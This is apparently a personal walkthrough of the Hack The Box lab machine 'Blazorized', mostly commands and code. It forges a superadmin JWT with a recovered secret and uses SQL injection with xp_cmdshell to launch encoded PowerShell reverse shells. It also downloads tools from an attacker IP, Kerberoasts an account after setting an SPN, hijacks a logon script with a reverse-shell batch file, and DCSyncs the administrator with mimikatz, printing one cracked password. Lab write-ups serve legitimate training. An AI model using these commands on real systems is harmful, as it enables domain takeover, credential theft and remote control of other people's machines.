HTB-Blazorized

Open questions

  • The trick of grabbing the JS and then pulling the DLLs out of it is still incomplete on my side; when I capture traffic with Burp as usual I never see the DLLs being requested.
  • For the jwt parameter, the writeup says to analyze the raw request with the Blazor Traffic Processor tool, but I searched all through my Burp history and could not find that raw request.

Normal steps

Subdomain brute-forcing turned up admin, and the site's requests also reveal an api subdomain; add both to the hosts file.

Posts

Then click Check; the posts it loads contain some good reference material, copied here:

Title: Active Directory

Below are links to projects and posts relating AD red-teaming:

https://github.com/Group3r/Group3r
https://github.com/Leo4j/Amnesiac
https://github.com/JPG0mez/ADCSync
https://github.com/Processus-Thief/HEKATOMB
https://github.com/Mazars-Tech/AD_Miner
https://github.com/AlmondOffSec/PassTheCert
https://github.com/synacktiv/ntdissector
https://github.com/Hackndo/pyGPOAbuse
https://exploit.ph/external-trusts-are-evil.html
https://github.com/SecuraBV/Timeroast
https://github.com/SadProcessor/CypherDog
https://mayfly277.github.io/

Title: Active Directory

Below are links to projects and posts relating AD blue-teaming:

https://github.com/lkarlslund/Adalanche
https://github.com/FalconForceTeam/FalconHound
https://github.com/csababarta/ntdsxtract
https://github.com/adrecon/ADRecon

Title: Uncategorized

The below research papers are uncategorized, and are to be investigated later:

https://thume.ca/2023/12/02/tracing-methods/
https://zakird.com/papers/tangled_web.pdf
https://jhalderm.com/pub/papers/censys-ccs15.pdf
https://jhalderm.com/pub/papers/zmap10gig-woot14.pdf
https://zakird.com/papers/lzr.pdf
https://zakird.com/papers/zlint.pdf
https://zakird.com/papers/zdns.pdf

Continuing

The writeup I followed says the API is called with an admin identity; decoding the JWT shows the admin's email address.


There is nothing to exploit there yet, though.

Bulk-download the DLLs

# blazor.boot.json lists every assembly the client loads; this assumes ./DLLs already exists
curl -s http://blazorized.htb/_framework/blazor.boot.json | jq | grep dll | cut -d ':' -f 1 | sed -e 's/\ //g' -e 's/"//g' | xargs -I % curl -s http://blazorized.htb/_framework/% -o ./DLLs/%


Forge a JWT

Either by hand in a JWT editor, or with this script:

import jwt  # PyJWT
from time import time

# HMAC signing secret recovered from the application (redacted here)
secret = "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"

# Claims the admin app checks: email, role, issuer, audience and expiry (10 days out)
data = {
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Super_Admin",
"iss": "http://api.blazorized.htb",
"aud": "http://admin.blazorized.htb",
"exp": int(time() + 60 * 60 * 24 * 10),
}

# HS512: the same secret signs and verifies, so knowing it lets us mint any role
token = jwt.encode(data, secret, algorithm='HS512')

print(token)

It was generated fine, but it did not take effect for me.

Writing it straight into Firefox's cookies did not work (no idea why); running the following instead did 👇

let token = 'eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJpc3MiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIiwiYXVkIjoiaHR0cDovL2FkbWluLmJsYXpvcml6ZWQuaHRiIiwiZXhwIjoxNzQ3OTI2ODcwfQ.WlUtJeMxxS6QGYaQjJ342qaYs7Jox8dAZRey83cPDUBPAk2nOPgEHpdPevk9Zqh4Gvhoe14NWySswpia9piiwA';

// run in the browser console on the admin app: it reads the token from localStorage under the key 'jwt', not from a cookie
localStorage.setItem('jwt', token);
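To make clear what the editor or the PyJWT script above actually produces, here is an added example (not from the original page) that forges and verifies an HS512 token with only the standard library. The secret is a constructed placeholder; the claim names and values are the ones used above. `decode_unverified` is what a token viewer shows without the key, which is how the admin email was read earlier, and `verify_hs512` is the check a server should do: pin the algorithm, compare the MAC in constant time, and enforce `exp`.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed placeholder: the real key is the HMAC secret the application signs with.
SECRET = "example-signing-secret"

# Claim names the admin app looks for (same as in the script above)
EMAIL_CLAIM = "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress"
ROLE_CLAIM = "http://schemas.microsoft.com/ws/2008/06/identity/claims/role"


def b64url_encode(data: bytes) -> str:
    # JWT segments are unpadded base64url
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _compact(obj) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode()


def superadmin_claims(ttl_seconds: int = 10 * 24 * 3600) -> dict:
    return {
        EMAIL_CLAIM: "superadmin@blazorized.htb",
        ROLE_CLAIM: "Super_Admin",
        "iss": "http://api.blazorized.htb",
        "aud": "http://admin.blazorized.htb",
        "exp": int(time.time()) + ttl_seconds,
    }


def forge_hs512(claims: dict, secret: str) -> str:
    """header.payload.signature; the signature is HMAC-SHA512 over 'header.payload'."""
    header = {"alg": "HS512", "typ": "JWT"}
    signing_input = b64url_encode(_compact(header)) + "." + b64url_encode(_compact(claims))
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha512).digest()
    return signing_input + "." + b64url_encode(sig)


def decode_unverified(token: str) -> dict:
    """What a token viewer shows without the key: the payload is only base64url, not encrypted."""
    return json.loads(b64url_decode(token.split(".")[1]))


def verify_hs512(token: str, secret: str, now=None) -> dict:
    """Server-side validation: pinned algorithm, constant-time MAC compare, expiry check."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS512":
        # never let the token choose the algorithm (alg=none / key-confusion attacks)
        raise ValueError("unexpected alg %r" % header.get("alg"))
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha512).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(payload_b64))
    if claims.get("exp", 0) <= (time.time() if now is None else now):
        raise ValueError("token expired")
    return claims


if __name__ == "__main__":
    token = forge_hs512(superadmin_claims(), SECRET)
    print(token)
    print(decode_unverified(token)[ROLE_CLAIM])
```

The forged token only works because the application shares one symmetric secret between the API that issues tokens and the admin app that consumes them; any party holding that secret is a token issuer.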

SQL injection in the admin panel -> command execution

' or 1=1; EXEC MASTER.sys.xp_cmdshell 'curl 10.10.16.2:444' -- -

A listener with nc gets the callback, so the stacked query runs. Swap in an encoded PowerShell reverse shell:

' or 1=1; EXEC MASTER.sys.xp_cmdshell 'powershell -e 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'-- -

Got a shell -> nu_1055

# pull accesschk down from the attacker's web server, then run SharpHound for BloodHound data
powershell -Command "Invoke-WebRequest -Uri 'http://10.10.16.2/accesschk.exe' -OutFile 'C:\Temp\accesschk.exe'"

SharpHound.exe -c all

Then transfer the zip to Kali (base64 it and copy the text out):

powershell
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\20250513004319_BloodHound.zip"))

Lateral movement 1 -> rsa_4810

Abusing WriteSPN

To perform targeted Kerberoasting, I assign an SPN to the RSA_4810 account. I can then request a service ticket for that fake service and get back a ticket encrypted with a key derived from RSA_4810's password, which can be cracked offline.

PS C:\Temp> . .\PowerView.ps1    
PS C:\Temp> Set-DomainObject -Identity RSA_4810 -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
PS C:\Temp> Get-DomainUser RSA_4810 | Get-DomainSPNTicket | Select-Object -ExpandProperty Hash

Feed the hash to john; it cracks to (Ni7856Do9854Ki05Ng0005 #) (?). Afterwards, clear the SPN from the account again so it is left as found.
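Before spending time cracking, it is worth reading the encryption type off the ticket hash: etype 23 (RC4, what PowerView requests by default) is far cheaper to crack than AES (17/18) and needs a different hashcat mode. This added parser (my example, not part of the writeup) takes the hashcat-style `$krb5tgs$` line that PowerView with `-OutputFormat Hashcat`, Rubeus and Impacket emit, and returns the user, realm, SPN and the hashcat mode to use. The sample lines are constructed, with dummy hex.

```python
import re

# hashcat modes per Kerberos encryption type; RC4 (23) is the cheap one to crack
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}

# etype 23 layout: *user$realm$spn*$<16-byte checksum>$<edata>
_RC4 = re.compile(
    r"^\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*\$(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$",
    re.I,
)
# etype 17/18 layout: user$realm$[*spn*$]<12-byte checksum>$<edata>
_AES = re.compile(
    r"^(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?:\*(?P<spn>[^*]*)\*\$)?(?P<checksum>[0-9a-f]{24})\$(?P<edata>[0-9a-f]+)$",
    re.I,
)


def parse_krb5tgs(line: str) -> dict:
    """Split a $krb5tgs$ hash line into its fields and pick the hashcat mode for it."""
    m = re.match(r"^\$krb5tgs\$(\d+)\$(.*)$", line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$ line")
    etype, rest = int(m.group(1)), m.group(2)
    if etype == 23:
        body = _RC4.match(rest)
    elif etype in (17, 18):
        body = _AES.match(rest)
    else:
        raise ValueError(f"unsupported etype {etype}")
    if not body:
        raise ValueError(f"malformed body for etype {etype}")
    info = body.groupdict()
    info.update(etype=etype, hashcat_mode=HASHCAT_MODE[etype], rc4=(etype == 23))
    return info


def triage(lines):
    """Group roasted accounts by hashcat mode so each set goes to its own hash file / cracking job."""
    out = {}
    for line in lines:
        info = parse_krb5tgs(line)
        out.setdefault(info["hashcat_mode"], []).append(info["user"])
    return out


# constructed samples for the SPN set above; the hex is dummy filler, not a real ticket
SAMPLE_RC4 = "$krb5tgs$23$*RSA_4810$BLAZORIZED.HTB$nonexistent/BLAHBLAH*$" + "a" * 32 + "$" + "b" * 64
SAMPLE_AES = "$krb5tgs$18$RSA_4810$BLAZORIZED.HTB$*nonexistent/BLAHBLAH*$" + "c" * 24 + "$" + "d" * 64

if __name__ == "__main__":
    for line in (SAMPLE_RC4, SAMPLE_AES):
        info = parse_krb5tgs(line)
        print(info["user"], info["spn"], "etype", info["etype"], "-> hashcat -m", info["hashcat_mode"])
```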

Lateral movement 2 -> ssa_6010

Check the next user: this one logs on once a minute.

# last logon time (lastLogon is a FILETIME; convert it)
[DateTime]::FromFileTime((Get-ADUser SSA_6010 -properties LastLogon).LastLogon)
# current time, for comparison
date
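The comparison above is what tells you the logon-script trick will fire quickly. As an added example (mine, not from the writeup), this does the same FILETIME conversion as `[DateTime]::FromFileTime` in Python and turns it into two checks: whether the account logged on inside a window, and the cadence between successive lastLogon samples. One caveat worth knowing: lastLogon is per domain controller and not replicated, so on a multi-DC domain you must query the DC the account authenticates to, or fall back to the replicated but coarse lastLogonTimestamp. The sample values are constructed.

```python
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond ticks since 1601-01-01 UTC
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UNIX_EPOCH_FILETIME = 116444736000000000  # 1970-01-01T00:00:00Z, handy for a sanity check
TICKS_PER_SECOND = 10_000_000


def filetime_to_datetime(filetime: int) -> datetime:
    """Same conversion as [DateTime]::FromFileTime, but in UTC rather than local time."""
    return _FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def datetime_to_filetime(dt: datetime) -> int:
    delta = dt - _FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def logged_on_within(last_logon: int, now: datetime, window_seconds: int) -> bool:
    """True when lastLogon falls inside the window ending at `now`; 0 means the account never logged on here."""
    if last_logon == 0:
        return False
    return (now - filetime_to_datetime(last_logon)).total_seconds() <= window_seconds


def logon_interval(samples):
    """Smallest gap in seconds between distinct lastLogon samples polled over time (None if fewer than two)."""
    times = sorted({filetime_to_datetime(s) for s in samples if s})
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return min(gaps) if gaps else None


if __name__ == "__main__":
    # constructed: four samples one minute apart, as a scheduled logon would produce
    polled = [UNIX_EPOCH_FILETIME + 60 * TICKS_PER_SECOND * k for k in range(4)]
    now = filetime_to_datetime(polled[-1] + 30 * TICKS_PER_SECOND)
    print(filetime_to_datetime(polled[-1]).isoformat(), logged_on_within(polled[-1], now, 60))
    print("cadence seconds:", logon_interval(polled))
```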

Check the user's logon script

Get-ADUser SSA_6010 -properties ScriptPath

Nothing is set, so set one (we have write access to the attribute):

Get-ADUser SSA_6010 | Set-ADUser -ScriptPath 'ddl'

Get-ADUser SSA_6010 -properties ScriptPath

Then look for a directory we can write to, since the script path is relative to the NETLOGON scripts share:

https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk

# upload accesschk through the C2 session
upload /home/kali/ppyy/tool/powershell/accesschk.exe C:\Temp\

# list everything under C:\Windows that blazorized\rsa_4810 can write to
.\accesschk.exe /accepteula -uwds blazorized\rsa_4810 C:\Windows

# check the current account's rights on that folder
icacls \Windows\SYSVOL\domain\scripts\A32FF3AEAA23
# full control, so go in
cd C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23

Then write the payload (a batch file that launches an encoded PowerShell reverse shell):

echo "powershell -e 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" | Out-File -FilePath ddl.bat -Encoding ASCII

Assign the attribute, i.e. point ScriptPath at the script file (relative to the scripts share):

Get-ADUser SSA_6010 | Set-ADUser -ScriptPath 'A32FF3AEAA23\ddl.bat'

Then start a listener; within a minute the shell arrives.

Local DCSync -> administrator

SSA_6010 has DCSync rights, so it can replicate every hash in the domain.

Upload mimikatz:

powershell -Command "Invoke-WebRequest -Uri 'http://10.10.16.2/mimikatz64.exe' -OutFile 'C:\Temp\mimikatz64.exe'"

# DCSync the administrator account; "exit" leaves mimikatz after the command runs
.\mimikatz64.exe "lsadump::dcsync /user:administrator" exit


Reference snippet for targeted Kerberoasting with explicit credentials (harmj0y's PowerView example, using his TESTLAB names):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Set-DomainObject -Credential $Cred -Identity harmj0y -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}

Get-DomainSPNTicket -Credential $Cred harmj0y | fl

References